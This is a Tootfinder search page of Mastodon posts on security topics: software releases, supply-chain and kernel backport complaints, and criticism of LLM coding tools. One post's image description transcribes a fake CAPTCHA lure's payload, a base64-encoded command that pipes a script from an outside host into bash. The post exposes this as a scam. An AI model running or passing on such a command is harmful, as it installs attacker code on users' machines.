Tootfinder

Opt-in global Mastodon full text search. Join the index!

@matthiasott@mastodon.social
2026-05-06 07:18:19

#Webmention for Craft v1.3.0 is out 🎉 – first in a short series of #security releases. 🔒
Fixes a stored XSS vulnerability in author/entry URLs, adds per-IP rate limits, and failure-backoff to harden the public endpoint against abuse.
Upgrade recommended!

@mgorny@social.treehouse.systems
2026-04-08 13:30:38

Fun post pointed out by Werner Koch on the GPG "post-quantum defaults" thread:
#cryptography #QuantumCryptography #security

@mgorny@social.treehouse.systems
2026-05-07 05:17:44

Everyone loves jeering at vibecoded #GitHub being down all the time. Yet for some reason people still neglect to question making #Microsoft the primary guarantor of their software's supply chain #security. And the whole attestation nonsense that doesn't really protect against the most likely attack vectors.

@kubikpixel@chaos.social
2026-04-20 05:05:46

«Security: This library has not undergone any third-party security audit. Usage is at own risk.»
If something like this is written on a code library, the confidence in your security is much higher than when commercial blenders want to advertise absolute IT security and are the safest — especially when the commercial goals still list ratings in this way.
#security

@frankel@mastodon.top
2026-04-14 17:23:25

#OpenSource #security at Astral
astral.sh/blog/open-source-sec

@crepererum@mastodon.online
2026-02-18 20:04:26

First blog post of the year:
#Rust #Security

@frankstohl@mastodon.social
2026-04-27 09:40:23

When politicians fall for the cheapest phishing attack, what is the countermeasure then? #Phishing #Politik #Security

@kaiengert@mastodon.social
2026-03-25 14:50:34

Please help with testing a new
#Thunderbird #Security feature: Unobtrusive Signatures, a novel mechanism for digitally signing email, currently implemented for #OpenPGP.
It avoids the u…

@vosje62@mastodon.nl
2026-02-19 13:59:18

RE: #Gemini #GoogleCoin #security

@vague@social.linux.pizza
2026-03-27 15:38:25

I understand #security is important and all, but getting logged out from #Teams and email frequently because MS thinks the auth cookie needs to be renewed is mighty irritating to say the least. To say more, I swear loudly every time I have to login again. Just fucking let me be.

@UP8@mastodon.social
2026-03-09 16:34:07

🤦🏿‍♀️ Zero Knowledge (About) Encryption: A Comparative Security Analysis of Three Cloud-based Password Managers
#security

@cyrevolt@mastodon.social
2026-04-12 14:49:28

On the #security issue with #AI detectors
For proper vuln research and disclosure, you need 3 parts:
1. a valid exploit, provable
2. an explanation of how it works
3. a solution to fix it and roll out an upgrade
Often enough, when the first part is done, people are like "…

@almad@fosstodon.org
2026-04-19 21:49:48

Oh wow. I guess it's "lazy and smart" in a way (and only gives you three attempts at loading, then 401)
#security

A screenshot of a website verification page for portal.secure-access.com. At the top, the URL "portal.secure-access.com" is displayed above a badge that reads "✓ PROTECTED BY SECUREVERIFY". A central white card contains the heading "Just One Sec..." and the text "We're verifying your connection to keep this site secure." The card features badges for "✓ 256-b 256-bit SSL", "☑ Verified", and "Ⓤ Secure", plus a green-outlined box that reads "✓ I'm not a robot" and "Click to verify — code will be c…
A snippet of code on a black background, appearing as if from a terminal window. The first line of text is: echo "Y3VybCAtcyAnaHR0cHM6Ly93aTVtc2FyZ "Y3VybCAtcyAnaHR0cHM6Ly93aTVtc2FyZW4uZGlnaXRhbC9zY3JpcHQu2gnIHwgYmFzaA==" | | base64 -d. The second line of text is: curl -s 'https://wi5msaren.digit 'https://wi5msaren.digital/script.sh' | bash%, followed by a small black square.

@usul@piaille.fr
2026-02-23 11:40:56

If the browser maker you are using is able to pull off something similar to what's described in this video, then it's a safe browser to use.
youtube.com/watch?app=desktop&

@eingfoan@infosec.exchange
2026-03-16 19:02:42

Is there a guide on how to integrate #SIEM systems and #VideoSuvailance systems or general alarming systems, for having physical and cyber #security in one place (if company is not that large ...…

@mgorny@social.treehouse.systems
2026-04-15 05:00:43

The state of #security these days: #Python #virtualenv package now includes SHA256 sums of their bundled wheels, declaring that it protects against "supply-chain compromise". Because obviously there are so many attack vectors that permit you to alter a .whl file but not the .py file in the same directory.
No, I'm not saying verifying checksum makes no sense, because indeed it can save some pain if fs is damaged somehow. However, calling this a "security" feature is a misnomer at best, and openly giving people false sense of security at worst.

@chris@mstdn.chrisalemany.ca
2026-02-25 17:28:58

Wow, so 1Password has increased its already expensive services. I have only used it for work/volunteer related stuff. I've been using Apple's Keychain and now Passwords App for years.
If you're on a Mac/iOS system and want to switch, 9to5 has a good run down on how to export your 1Password database and bring it into Passwords.
If you've never used a Password Manager, you really really should.
#Security #Passwords #Apple #1Password #PasswordManager
9to5mac.com/2026/02/25/heres-h

@mgorny@social.treehouse.systems
2026-05-05 05:25:48

#Python #cryptography library (yes, the one that criticizes everything and everyone) is now vibecoded. Our future is truly bright!
Noticed because apparently "Claude" wrote a test that OOM-ed my system. But hey, #RustLang protects against memory errors, so it's fine to vibecode your security critical components.
#security #AI #LLM #NoAI #NoLLM

@mgorny@social.treehouse.systems
2026-04-30 05:38:38

So you read about #CopyFail, and are like… owww, shit. But then you see that it was responsibly disclosed after being fixed in main, we had releases since, they went stable in #Gentoo (over other #security fixes), so we should be good, right?
Except that it turns out that after it has been fixed in mainline, nobody bothered actually backporting the fix to all the LTS branches. And it doesn't apply cleanly (#Gentoo #Linux

@mgorny@social.treehouse.systems
2026-05-02 05:55:56

Greg Kroah-Hartman: "If you look there are thousands of unfixed CVEs in the older LTS kernels right now, and if distros or users that rely on those older branches wish to see those resolved, they need to provide working backports to us to apply, as our first attempt did not work (which is why they are unfixed in those branches.)"
Really asking for a "Pray tell us", given that nobody actually bothered disclosing the problem to downstreams and that the commit message was hiding it.
Either way, apparently the great LLM-backed patch backporting process that #NVidia is so proud of doesn't really work. Upstream doesn't really care about #LTS branches, and they should be considered insecure by default.
#Gentoo #Linux #CopyFail #security

@frankstohl@mastodon.social
2026-04-09 17:38:15

Is Microsoft breaking WireGuard? #vpn #wireguard #security #windows

@mgorny@social.treehouse.systems
2026-03-19 12:23:26

Proper #security nightmare time.
#LMDB is a database that's designed to operate on trusted input. Upstream has historically rejected all bug reports regarding problems with malformed input.
Py-LMDB project provides #Python bindings to LMDB that are normally built against bundled LMDB. Someone recently started mass-filing "untrusted input" vulnerabilities against py-lmdb, and py-lmdb started #slop - coding fixes to their bundled LMDB. Of course, nobody even bothered reporting most of these bugs upstream, and the one that I've seen reported was rejected as "don't do that".
Py-LMDB supports building against system LMDB, and #Gentoo was doing that so far. However, now we are facing a problem: system LMDB operates under the assumption that it is working on trusted input, while py-lmdb (and its bundled LMDB) operates under the assumption that it may be working with untrusted input. The guarantees no longer align.
If we continue to use system LMDB (and skip all the added slop tests that literally cause Python to crash), then Gentoo's py-lmdb package will now have different input expectations than upstream py-lmdb. And of course we can't just remove that crap because someone added exactly one package (TorchVision, i.e. part of the plagiarism machine suite) depending on it.
bugs.gentoo.org/971352

@mgorny@social.treehouse.systems
2026-03-16 04:40:34

Modern use of LLMs often involves giving them access to the local system: to read and write your project files, and to execute arbitrary commands, often unsupervised. So aren't people worried about a harness just doing what a remote #LLM tells it to do?
I think a statement I've heard lately summarizes the mindset well. It went something along the lines of "I can't give you a 100% guarantee, but I've noticed that LLMs are very good at following instructions, and they're getting better and better, so I don't worry about that anymore".
Like, it is completely fine to introduce a humongous security hole, because the probability that a model will *accidentally* do something horrible is decreasing.
#AI #NoAI #NoLLM #security